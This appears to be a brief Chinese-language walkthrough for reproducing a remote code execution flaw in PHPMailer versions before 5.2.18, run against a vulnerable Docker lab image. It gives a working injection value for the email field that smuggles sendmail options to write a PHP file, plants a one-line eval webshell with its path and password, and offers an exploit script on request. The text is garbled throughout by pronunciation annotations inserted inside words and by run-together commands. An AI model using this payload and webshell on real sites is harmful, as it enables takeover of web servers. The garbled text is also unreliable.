PHPMailer中怎么復現遠程命令執行漏洞

PHPMailer中怎么復現遠程命令執行漏洞，相信很多沒(méi)有經(jīng)驗的人對此束手無(wú)策，為此本文總結了問(wèn)題出現的原因和解決方法，通過(guò)這篇文章希望你能解決這個(gè)問(wèn)題。

一、漏洞簡(jiǎn)介

PHPMailer是PHP電子郵件創(chuàng )建及傳輸類(lèi)，用于多個(gè)開(kāi)源項目：WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。

PHPMailer < 5.2.18版本存在安全漏洞，可使未經(jīng)身份驗證的遠程攻擊者在Web用戶(hù)上下文中執行任意代碼，遠程控制目標web應用。

二、影響版本：

PHPMailer<5.2.18

三、漏洞復現

Docker環(huán)境：

dockerrun --rm -it -p8080:80vulnerables/cve-2016-10033

拉去鏡像啟動(dòng)環(huán)境：

http://192.168.1.107:8080/

http://192.168.1.107:8080/在name處隨便輸入比如“aaa”，在email處輸入："aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com在message處輸入一句話(huà)木馬：<?php@eval($_POST['thelostworld']);?>

上傳完一句話(huà)木馬后，頁(yè)面會(huì )響應3-5分鐘，響應時(shí)間較長(cháng)

木馬地址：http://192.168.1.107:8080/a.php 密碼：thelostworld

虛擬終端：

使用腳本：

獲取腳本后臺回復“PHPMailer”獲取腳本